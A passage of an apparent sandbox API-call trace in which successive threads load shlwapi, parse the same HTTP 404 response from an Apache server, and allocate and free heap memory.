lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0248.783] GetProcessHeap () returned 0x840000 [0248.783] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 Thread: id = 112 os_tid = 0xa28 [0249.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.351] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:28 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0249.351] GetProcessHeap () returned 0x840000 [0249.351] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0249.351] GetProcessHeap () returned 0x840000 [0249.351] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0249.351] GetProcessHeap () returned 0x840000 [0249.351] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 Thread: id = 113 os_tid = 0x1010 [0249.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.860] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:28 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0249.860] GetProcessHeap () returned 0x840000 [0249.861] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0249.861] GetProcessHeap () returned 0x840000 [0249.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0249.861] GetProcessHeap () returned 0x840000 [0249.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 Thread: id = 114 os_tid = 0xb78 [0250.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.382] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:29 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.382] GetProcessHeap () returned 0x840000 [0250.382] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0250.382] GetProcessHeap () returned 0x840000 [0250.382] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0250.382] GetProcessHeap () returned 0x840000 [0250.382] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 Thread: id = 115 os_tid = 0xf54 [0250.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.895] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:30 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.895] GetProcessHeap () returned 0x840000 [0250.895] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0250.895] GetProcessHeap () returned 0x840000 [0250.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0250.895] GetProcessHeap () returned 0x840000 [0250.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8815d0 | out: hHeap=0x840000) returned 1 Thread: id = 116 os_tid = 0x8fc [0251.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0251.544] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:30 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.545] GetProcessHeap () returned 0x840000 [0251.545] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0251.545] GetProcessHeap () returned 0x840000 [0251.545] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0251.545] GetProcessHeap () returned 0x840000 [0251.545] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8815d0 | out: hHeap=0x840000) returned 1 Thread: id = 117 os_tid = 0x93c [0252.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.083] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:31 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.083] GetProcessHeap () returned 0x840000 [0252.083] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0252.083] GetProcessHeap () returned 0x840000 [0252.083] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0252.083] GetProcessHeap () returned 0x840000 [0252.084] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 118 os_tid = 0x8f4 [0252.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0252.660] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:31 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.660] GetProcessHeap () returned 0x840000 [0252.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0252.660] GetProcessHeap () returned 0x840000 [0252.660] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0252.660] GetProcessHeap () returned 0x840000 [0252.660] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 119 os_tid = 0xcd8 [0253.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.168] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:32 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.169] GetProcessHeap () returned 0x840000 [0253.169] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0253.169] GetProcessHeap () returned 0x840000 [0253.169] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0253.169] GetProcessHeap () returned 0x840000 [0253.169] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 120 os_tid = 0x1364 [0253.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0253.703] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:32 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.703] GetProcessHeap () returned 0x840000 [0253.703] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0253.703] GetProcessHeap () returned 0x840000 [0253.703] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0253.703] GetProcessHeap () returned 0x840000 [0253.703] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 121 os_tid = 0x108c [0254.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.271] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:33 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0254.271] GetProcessHeap () returned 0x840000 [0254.271] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0254.272] GetProcessHeap () returned 0x840000 [0254.272] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0254.272] GetProcessHeap () returned 0x840000 [0254.272] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 122 os_tid = 0x1098 [0254.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.833] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:33 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0254.833] GetProcessHeap () returned 0x840000 [0254.833] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0254.833] GetProcessHeap () returned 0x840000 [0254.833] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0254.833] GetProcessHeap () returned 0x840000 [0254.833] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 123 os_tid = 0xcfc [0255.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.332] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:34 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.332] GetProcessHeap () returned 0x840000 [0255.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0255.332] GetProcessHeap () returned 0x840000 [0255.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0255.332] GetProcessHeap () returned 0x840000 [0255.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 124 os_tid = 0x41c [0255.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.919] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:35 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.919] GetProcessHeap () returned 0x840000 [0255.919] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0255.919] GetProcessHeap () returned 0x840000 [0255.919] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0255.919] GetProcessHeap () returned 0x840000 [0255.919] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 125 os_tid = 0x100c [0256.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0256.485] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:35 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.485] GetProcessHeap () returned 0x840000 [0256.485] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0256.485] GetProcessHeap () returned 0x840000 [0256.485] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0256.486] GetProcessHeap () returned 0x840000 [0256.486] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 126 os_tid = 0x1298 [0257.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0257.101] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:36 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0257.101] GetProcessHeap () returned 0x840000 [0257.101] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0257.102] GetProcessHeap () returned 0x840000 [0257.102] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0257.102] GetProcessHeap () returned 0x840000 [0257.102] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 127 os_tid = 0x1138 [0258.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0258.810] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:37 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.810] GetProcessHeap () returned 0x840000 [0258.810] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0258.810] GetProcessHeap () returned 0x840000 [0258.810] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0258.810] GetProcessHeap () returned 0x840000 [0258.810] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 128 os_tid = 0x1104 [0259.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0259.655] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:38 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0259.655] GetProcessHeap () returned 0x840000 [0259.655] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0259.655] GetProcessHeap () returned 0x840000 [0259.655] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0259.655] GetProcessHeap () returned 0x840000 [0259.655] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 129 os_tid = 0x103c [0260.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.285] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:39 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.285] GetProcessHeap () returned 0x840000 [0260.285] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0260.285] GetProcessHeap () returned 0x840000 [0260.286] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0260.286] GetProcessHeap () returned 0x840000 [0260.286] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 130 os_tid = 0x1048 [0260.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.773] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:39 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.773] GetProcessHeap () returned 0x840000 [0260.773] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0260.773] GetProcessHeap () returned 0x840000 [0260.773] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0260.773] GetProcessHeap () returned 0x840000 [0260.773] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 131 os_tid = 0x1060 [0261.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0261.416] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:40 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0261.416] GetProcessHeap () returned 0x840000 [0261.416] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0261.416] GetProcessHeap () returned 0x840000 [0261.416] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0261.416] GetProcessHeap () returned 0x840000 [0261.416] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 132 os_tid = 0xf9c [0262.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0262.546] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:41 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0262.546] GetProcessHeap () returned 0x840000 [0262.546] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0262.546] GetProcessHeap () returned 0x840000 [0262.546] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0262.547] GetProcessHeap () returned 0x840000 [0262.547] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 133 os_tid = 0x1128 [0263.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.099] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:42 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.099] GetProcessHeap () returned 0x840000 [0263.099] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0263.099] GetProcessHeap () returned 0x840000 [0263.100] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0263.100] GetProcessHeap () returned 0x840000 [0263.100] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 134 os_tid = 0xb90 [0263.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.691] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:42 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.691] GetProcessHeap () returned 0x840000 [0263.691] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0263.691] GetProcessHeap () returned 0x840000 [0263.691] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0263.691] GetProcessHeap () returned 0x840000 [0263.691] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 135 os_tid = 0xd9c [0264.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.206] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:43 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.207] GetProcessHeap () returned 0x840000 [0264.207] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0264.207] GetProcessHeap () returned 0x840000 [0264.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0264.207] GetProcessHeap () returned 0x840000 [0264.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 136 os_tid = 0x3b8 [0264.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.797] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:43 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0264.797] GetProcessHeap () returned 0x840000 [0264.797] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0264.797] GetProcessHeap () returned 0x840000 [0264.797] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0264.797] GetProcessHeap () returned 0x840000 [0264.798] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 137 os_tid = 0x1384 [0265.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0265.376] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:44 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.376] GetProcessHeap () returned 0x840000 [0265.376] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0265.376] GetProcessHeap () returned 0x840000 [0265.376] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0265.376] GetProcessHeap () returned 0x840000 [0265.376] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 138 os_tid = 0xad8 [0265.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0265.973] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:45 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.973] GetProcessHeap () returned 0x840000 [0265.973] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0265.973] GetProcessHeap () returned 0x840000 [0265.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0265.973] GetProcessHeap () returned 0x840000 [0265.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 139 os_tid = 0x9d8 [0266.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.892] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:45 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0266.892] GetProcessHeap () returned 0x840000 [0266.892] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0266.892] GetProcessHeap () returned 0x840000 [0266.892] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0266.892] GetProcessHeap () returned 0x840000 [0266.892] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 140 os_tid = 0x10b0 [0267.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0267.463] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:46 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.463] GetProcessHeap () returned 0x840000 [0267.463] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0267.463] GetProcessHeap () returned 0x840000 [0267.463] HeapFree (in: hHeap=0x840000, dwFlags=0x0, 